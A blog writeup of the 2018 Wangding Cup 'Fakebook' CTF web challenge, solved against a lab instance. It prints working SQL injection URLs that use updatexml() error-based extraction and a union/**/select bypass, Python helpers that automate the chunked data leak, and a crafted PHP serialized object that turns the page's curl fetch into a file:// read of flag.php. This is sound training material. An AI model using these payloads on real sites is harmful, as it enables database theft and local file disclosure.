网鼎杯 (Wangding Cup) 2018: Fakebook

Last updated: 22 January 2022 (evening)

As usual, start with recon: look for backup files, leaked .git directories, robots.txt and so on.

Sure enough, this challenge has a robots.txt that leads to the source code.

[screenshot]

[screenshot]

```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";   # the three properties

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }   # constructor: just assigns the fields

    function get($url)
    {
        $ch = curl_init();   # first time I have seen this function; an excerpt of the official docs is below

        curl_setopt($ch, CURLOPT_URL, $url);            # URL to fetch (any scheme libcurl supports, nothing restricts it)
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);    # return the response as a string instead of printing it
        $output = curl_exec($ch);                       # perform the request
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);   # read the HTTP status code
        if($httpCode == 404) {
            return 404;                                 # note: the handle is not closed on this path
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }   # fetch the blog page

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }   # validates the blog field; I wanted to read files through a pseudo-protocol (file://) here, but this check filters it out

}
```

Comments added inline above.

A word on the curl calls: curl_init() initialises a cURL session and returns a handle for curl_setopt(), curl_exec() and curl_close(); it returns false on failure. Note that get() sets no CURLOPT_PROTOCOLS restriction, so libcurl will fetch file:// URLs just as readily as http(s):// ones, which is what the rest of this writeup relies on.

[screenshot]

After a round of attempts I was stuck and went to read other people's writeups.

Reading them it clicked: I had been staring at the SSRF and missed an obvious injection point.

```
http://cbbe028d-8d11-4936-ab0a-ce9c6d2fd080.node4.buuoj.cn:81/view.php?no=2
```

The no parameter here is SQL-injectable.

[screenshot]

Union query: a /**/ comment in place of the space gets past the filter on union select, and only one column's value is displayed on the page.

[screenshot]

That gives the database name.

Going further down with the union query yields nothing, though.

[screenshot]

As the screenshot shows, the page does return the database error text, so switch to error-based injection with updatexml().

Table names in the current database:

```
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()),%27~%27),1)%23
```

[screenshot]

Column names of the users table:

```
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),%27~%27),1)%23
```

[screenshot]

The data column:

```
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20data%20from%20users),%27~%27),1)%23
```

[screenshot]

The data turns out to be a serialized PHP object:

```
O:8:"UserInfo":3:{s:4:"name";s:
```

Only the beginning comes back. An updatexml() XPath error shows at most 32 characters of the offending expression, and one of those is the leading ~ marker, so each request leaks 31 characters of data.

Read the rest in chunks with substring() (the offset is 1-based):

```
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20or%20updatexml(1,concat(%27~%27,(select%20substring(data,31)%20from%20users),%27~%27),1)%23
```

[screenshot]
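The chunked extraction above, written out as an added example (this is not code from the writeup): a Python client that builds the same updatexml() payload, pulls the leaked fragment out of the XPATH syntax error text, and advances the substring() offset by 31 until the closing ~ marker becomes visible. Nothing here talks to a real target: `fake_server()` stands in for view.php, does not run any SQL, only recognises the two expressions the writeup sends, and reproduces MySQL's 32-character truncation on a constructed sample row. The names build_payload, extract_chunk, leak_column and fake_server, and the sample data, are assumptions made for this example.

```python
import re

# Constructed sample row standing in for the `data` column of `users`
# (assumption for this example: same shape as the object recovered in the writeup).
SAMPLE_DATA = ('O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;'
               's:4:"blog";s:29:"file:///var/www/html/flag.php";}')

XPATH_LIMIT = 32  # MySQL shows at most 32 characters of the bad XPath expression


def build_payload(expr: str) -> str:
    """The writeup's error-based injection for the `no` parameter of view.php."""
    return f"-1 or updatexml(1,concat('~',({expr}),'~'),1)#"


def mysql_updatexml_error(xpath: str) -> str:
    """Error text MySQL returns when updatexml() is handed an invalid XPath string."""
    return f"XPATH syntax error: '{xpath[:XPATH_LIMIT]}'"


def fake_server(no: str) -> str:
    """Stand-in for view.php?no=... (assumption: not the challenge's code).
    Recognises `data` and `substring(data,start[,len])` in the injected
    subquery and answers the way MySQL would for SAMPLE_DATA."""
    m = re.search(r"\(select (.+?) from users\)", no)
    if not m:
        return "<html>normal page</html>"
    expr = m.group(1)
    if expr == "data":
        value = SAMPLE_DATA
    else:
        sub = re.fullmatch(r"substring\(data,(\d+)(?:,(\d+))?\)", expr)
        if not sub:
            return "<html>normal page</html>"
        start = int(sub.group(1)) - 1  # MySQL string positions are 1-based
        if sub.group(2) is None:
            value = SAMPLE_DATA[start:]
        else:
            value = SAMPLE_DATA[start:start + int(sub.group(2))]
    return mysql_updatexml_error("~" + value + "~")


def extract_chunk(page: str):
    """Return (fragment, finished): the characters leaked after the opening ~,
    and whether the closing ~ was visible, meaning nothing is left to read.
    Assumes the data itself contains no ~ (the marker the writeup chose)."""
    m = re.search(r"XPATH syntax error: '(.*)'", page)
    if not m or not m.group(1).startswith("~"):
        raise ValueError("no updatexml error in the response")
    body = m.group(1)[1:]
    finished = body.endswith("~")
    return (body[:-1] if finished else body), finished


def leak_column(fetch, step: int = XPATH_LIMIT - 1) -> str:
    """Read the whole `data` value 31 characters at a time, as the writeup does
    by hand with substring(). `fetch` takes the `no` value and returns the page."""
    leaked, start = "", 1
    while True:
        page = fetch(build_payload(f"select substring(data,{start},{step}) from users"))
        fragment, finished = extract_chunk(page)
        leaked += fragment
        if finished:
            return leaked
        start += step


if __name__ == "__main__":
    print(fake_server(build_payload("select data from users")))
    print(leak_column(fake_server))
```

Against a live instance the `fetch` argument would be a function that sends the string as the `no` query parameter (for example with the requests library, which is not imported here) and returns the response body; extract_chunk() searches the whole page, so surrounding HTML does not matter.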

Now rebuild the object ourselves. The class only needs the same name and the same three public properties as the server's UserInfo; serialize() records property names and values, so the constructor can be dropped. The values are set to the ones used in the payload that follows.

```php
<?php

class UserInfo{
    public $name = "test";
    public $age = 1;
    public $blog = "file:///var/www/html/flag.php";
}
$a = new UserInfo();
echo serialize($a);
?>
```

At bottom this is an SSRF reached through deserialization: the final payload puts our own serialized UserInfo into the column that view.php unserializes, with blog set to file:///var/www/html/flag.php. The isValidBlog() regex never runs on this path (it only guards input entered through the form), and get() puts no restriction on the URL scheme, so curl reads the flag file and its contents come back in the page.

```
O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
```

[screenshot]

```
http://c48b08d3-c418-4f93-92e2-352f0cd9fb50.node4.buuoj.cn:81/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:4:%22test%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27%23
```

[screenshot]
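Two things the final step depends on, as an added example rather than the writeup's own code: a Python port of the isValidBlog() regex showing that a file:// (or bare-IP) blog URL is rejected when it arrives through the form, and a small routine that produces the same bytes PHP's serialize() emits for UserInfo, so the object can be smuggled in through the union/**/select injection instead. is_valid_blog(), php_serialize_userinfo() and union_payload() are names chosen here; the four-column layout of the union follows the writeup's 1,2,3,'<object>' payload.

```python
import re

# isValidBlog()'s PCRE pattern from user.php, ported to Python (same syntax for
# every construct used; the PHP /i flag becomes re.I).
BLOG_RE = re.compile(
    r"^(((http(s?))://)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$", re.I)


def is_valid_blog(blog: str) -> bool:
    """What the form's validation would say about a blog value."""
    return BLOG_RE.search(blog) is not None


def php_serialize_userinfo(name: str, age: int, blog: str, cls: str = "UserInfo") -> str:
    """Reproduce PHP serialize() for an object with public name/age/blog properties.
    PHP's s:N: prefix counts bytes, not characters, so lengths are taken from UTF-8."""
    def s(v: str) -> str:
        return f's:{len(v.encode("utf-8"))}:"{v}";'
    props = [("name", s(name)), ("age", f"i:{int(age)};"), ("blog", s(blog))]
    body = "".join(s(k) + v for k, v in props)
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def union_payload(serialized: str, columns: int = 4) -> str:
    """The writeup's final `no` value: -1 union/**/select 1,2,3,'<object>'#
    The /**/ stands in for the space that the 'union select' filter matches on;
    the object goes in the last column because that is the one view.php
    unserializes. The value sits inside single quotes, so it must not contain one."""
    if "'" in serialized:
        raise ValueError("serialized object contains a quote; it would break the query")
    fillers = ",".join(str(i) for i in range(1, columns))
    return f"-1 union/**/select {fillers},'{serialized}'#"


if __name__ == "__main__":
    flag_url = "file:///var/www/html/flag.php"
    print("form accepts file:// blog?", is_valid_blog(flag_url))
    obj = php_serialize_userinfo("test", 1, flag_url)
    print(obj)
    print(union_payload(obj))
```

The serialized string must be URL-encoded before it goes into the query string (the writeup's URL shows %22 for the double quotes and %27 for the surrounding single quotes); urllib.parse.quote() does that.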


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when republishing.